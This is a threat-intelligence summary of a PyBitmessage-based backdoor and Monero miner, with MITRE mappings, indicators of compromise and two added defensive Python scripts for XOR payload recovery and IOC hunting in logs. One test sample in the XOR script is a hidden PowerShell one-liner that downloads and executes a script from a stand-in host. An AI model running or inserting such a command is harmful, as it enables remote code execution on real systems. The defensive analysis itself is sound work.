PyBitmessage Backdoor Malware Installed with CoinMiner

AhnLab Security Intelligence Center (ASEC) discovered a novel backdoor that uses the PyBitmessage library for encrypted peer-to-peer (P2P) command and control (C2) and installs a Monero coin miner on the infected host. Because the C2 traffic is carried inside ordinary Bitmessage network messages, antivirus and network security products have difficulty telling the attacker's commands apart from legitimate Bitmessage activity.

Keypoints

  • A new backdoor uses the PyBitmessage library to communicate over Bitmessage's decentralized P2P network; messages are encrypted by the Bitmessage protocol, so the C2 content is not exposed to network inspection.
  • The backdoor also installs a Monero coin miner that consumes the infected system's resources to mine cryptocurrency for the attacker.
  • The backdoor logic runs as PowerShell: a message received over the PyBitmessage C2 channel is saved and executed as a PowerShell script, which the report characterises as a fileless mode of operation.
  • The PyBitmessage component is downloaded either from the project's GitHub release page or from a Russian-language file hosting site (spac1.com); the latter suggests a Russian-speaking threat actor.
  • To hinder detection and analysis, the malware patches a specific offset of the legitimate QtGui4.dll shipped with PyBitmessage to 0x00, disabling part of the DLL's normal functionality; comparing the on-disk DLL's hash with the official release copy will reveal the tampering.
  • C2 commands are concealed inside legitimate Bitmessage traffic, making them difficult to distinguish from benign network activity.
  • Recommendations: avoid cracked software and downloads from unknown sources, keep security products up to date, and treat Bitmessage P2P traffic as worth investigating in environments where it is not expected.

MITRE Techniques

  • [T1071] Application Layer Protocol – The malware uses the Bitmessage protocol over the P2P network for command and control, hiding malicious communication inside messages from legitimate users (‘C2 commands and control messages are hidden within messages from real users in the Bitmessage network’).
  • [T1086] PowerShell (a deprecated ID; the current mapping is T1059.001 Command and Scripting Interpreter: PowerShell) – PowerShell is leveraged to run the backdoor logic and the commands received over the Bitmessage C2 channel, operating in a fileless manner (‘message received from the threat actor is saved and executed as a PowerShell script’).
  • [T1105] Ingress Tool Transfer – The malware downloads the PyBitmessage executable from GitHub or from a file hosting URL chosen by the attacker (‘it attempts to download the file from the Release page on GitHub… or a URL suspected to be a personal drive’).
  • [T1027] Obfuscated Files or Information – Encoded payloads are recovered with XOR operations (the decoding step itself maps more precisely to T1140 Deobfuscate/Decode Files or Information), and QtGui4.dll is tampered with to remove part of its normal functionality (‘decrypts it through XOR operations’ and ‘patching a specific offset of this QtGui4.dll file to 0x00’).
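Two of the behaviours above lend themselves to quick triage on a suspect host: recovering the XOR-encoded payload and locating the bytes patched in QtGui4.dll. The helpers below are an added example for this summary, not code from the ASEC report or from PyBitmessage. They assume a single-byte XOR key (the report only says "XOR operations"; extend the key if a sample uses a longer one) and a pristine QtGui4.dll from the same PyBitmessage release to diff against; all sample bytes are constructed.

```python
"""Triage helpers: single-byte XOR recovery and DLL zero-patch location.
Added example, not code from the ASEC report. Assumptions: single-byte XOR
key; a pristine copy of the DLL is available; all sample data is constructed."""
from typing import List, Tuple

# Strings an analyst would expect inside the recovered payload (PE or PowerShell).
KNOWN_MARKERS = (b"MZ", b"powershell", b"Invoke-Expression", b"IEX", b"bitmessage")


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR `data` with a repeating `key`; the same call encodes and decodes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def score_plaintext(buf: bytes) -> int:
    """Heuristic plaintext score: marker hits, a bonus for an MZ header at
    offset 0, and a bonus when every byte is printable ASCII (script text)."""
    score = sum(buf.count(m) for m in KNOWN_MARKERS)
    if buf.startswith(b"MZ"):
        score += 10
    if buf and all(0x20 <= b < 0x7F or b in (0x09, 0x0A, 0x0D) for b in buf):
        score += 3
    return score


def brute_force_single_byte_xor(blob: bytes) -> Tuple[int, bytes]:
    """Try all 256 single-byte keys and return (key, decoded) with the best
    score. Assumption: single-byte key. Key 0 is tried first, so an unencoded
    blob is returned unchanged."""
    best_key, best_buf, best_score = 0, blob, -1
    for k in range(256):
        cand = xor_bytes(blob, bytes([k]))
        s = score_plaintext(cand)
        if s > best_score:
            best_key, best_buf, best_score = k, cand, s
    return best_key, best_buf


def find_zeroed_offsets(pristine: bytes, suspect: bytes) -> List[int]:
    """Offsets where `suspect` differs from `pristine` and now holds 0x00.
    Run on the on-disk QtGui4.dll against a copy from the official release
    to locate the in-place patch the report describes."""
    if len(pristine) != len(suspect):
        raise ValueError("size mismatch: not an in-place patch of the same build")
    return [i for i, (a, b) in enumerate(zip(pristine, suspect)) if a != b and b == 0]


if __name__ == "__main__":
    # Constructed sample: a PowerShell one-liner XOR-encoded with key 0x5A.
    plain = b"powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"
    key, recovered = brute_force_single_byte_xor(xor_bytes(plain, b"\x5a"))
    print(f"key=0x{key:02x} payload={recovered!r}")

    # Constructed sample DLL bytes with two positions patched to 0x00.
    good = bytes(range(1, 33))
    bad = bytearray(good)
    bad[7] = 0
    bad[20] = 0
    print("patched offsets:", find_zeroed_offsets(good, bytes(bad)))
```

The scoring is deliberately crude: it is meant to pick out the one key that yields readable PowerShell or a PE header, not to handle multi-byte keys or compressed payloads. The DLL diff only reports bytes that became 0x00, matching the patch the report describes; widen the condition to `a != b` to list every change.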

Indicators of Compromise

  • [MD5 Hashes] Backdoor and miner files – 17909a3f757b4b31ab6cd91b3117ec50, 29d43ebc516dd66f2151da9472959890, and 4 others (listed in the full report).
  • [URLs] Mining pool endpoints contacted by the miner and the file hosting URL used to fetch PyBitmessage – http://krb.miner.rocks:4444/, http://krb.sberex.com:3333/, http://pool.karbowanec.com:3333/, http://pool.supportxmr.com:3333/, https://spac1.com/files/view/bitmessage-6-3-2-80507747/. Note that public mining pools also serve legitimate miners, so treat a pool connection as an indicator only where mining is not expected on the host.
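The network indicators above are the easiest to hunt for retrospectively. The script below is an added example for this summary, not code from the ASEC report: it matches proxy/firewall records against the listed pool hosts and the PyBitmessage download URL, and additionally flags TCP/8444, PyBitmessage's default listening port. The whitespace-separated log format and the sample lines are constructed, and the 8444 check is a hunting heuristic of this example rather than an indicator from the report.

```python
"""Hunt for the report's network IOCs in constructed proxy/firewall lines.
Added example, not code from the ASEC report. The log format, sample lines
and the TCP/8444 heuristic are assumptions of this example."""
from typing import Dict, List, Optional
from urllib.parse import urlsplit

# Indicators exactly as listed in the report.
REPORT_URLS = [
    "http://krb.miner.rocks:4444/",
    "http://krb.sberex.com:3333/",
    "http://pool.karbowanec.com:3333/",
    "http://pool.supportxmr.com:3333/",
    "https://spac1.com/files/view/bitmessage-6-3-2-80507747/",
]

# Bare host:port entries are mining pools; the entry with a path is the
# download location of the PyBitmessage component.
POOL_HOSTS: Dict[str, int] = {}
DOWNLOAD_URLS: List[str] = []
for _u in REPORT_URLS:
    _p = urlsplit(_u)
    if _p.path == "/":
        POOL_HOSTS[_p.hostname] = _p.port
    else:
        DOWNLOAD_URLS.append(_u)

BITMESSAGE_DEFAULT_PORT = 8444  # heuristic (assumption): default PyBitmessage listener port


def parse_line(line: str) -> Optional[Dict]:
    """Constructed format: '<ts> <src_ip> <dst_host> <dst_port> [<url>]'."""
    parts = line.split()
    if len(parts) not in (4, 5) or not parts[3].isdigit():
        return None
    rec = {"ts": parts[0], "src": parts[1], "dst": parts[2], "port": int(parts[3])}
    rec["url"] = parts[4] if len(parts) == 5 else None
    return rec


def classify(rec: Dict) -> Optional[Dict]:
    """Return a hit for a pool host (any port), the download URL, or port 8444."""
    dst, port, url = rec["dst"], rec["port"], rec["url"]
    if dst in POOL_HOSTS:
        note = "" if port == POOL_HOSTS[dst] else f" (report lists port {POOL_HOSTS[dst]})"
        return {"category": "miner_pool", "detail": f"{dst}:{port}{note}"}
    if url and any(url.startswith(d) for d in DOWNLOAD_URLS):
        return {"category": "pybitmessage_download", "detail": url}
    if port == BITMESSAGE_DEFAULT_PORT:
        return {"category": "bitmessage_port",
                "detail": f"{dst}:{port} (heuristic: legitimate Bitmessage looks the same)"}
    return None


def scan_log(lines: List[str]) -> List[Dict]:
    """Parse each line, skip malformed ones, and collect classified hits."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hit = classify(rec)
        if hit:
            hits.append({"ts": rec["ts"], "src": rec["src"], **hit})
    return hits


SAMPLE_LOG = [  # constructed records, not real telemetry
    "2024-05-02T09:00:01Z 10.0.0.5 www.example.org 443 https://www.example.org/",
    "2024-05-02T09:00:07Z 10.0.0.5 spac1.com 443 https://spac1.com/files/view/bitmessage-6-3-2-80507747/",
    "2024-05-02T09:01:30Z 10.0.0.5 krb.miner.rocks 4444",
    "2024-05-02T09:02:15Z 10.0.0.5 198.51.100.7 8444",
    "2024-05-02T09:03:00Z 10.0.0.9 pool.supportxmr.com 443",
    "malformed line",
]

if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(h)
```

Pool hosts are matched on hostname alone and the port mismatch is only annotated, since a miner can be reconfigured to another port on the same pool. The 8444 hit is a lead, not a verdict: the report's whole point is that the C2 rides inside legitimate Bitmessage traffic, so this check is useful only where Bitmessage is not expected, and an attacker can change the listener port.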

Read more: https://asec.ahnlab.com/en/88109/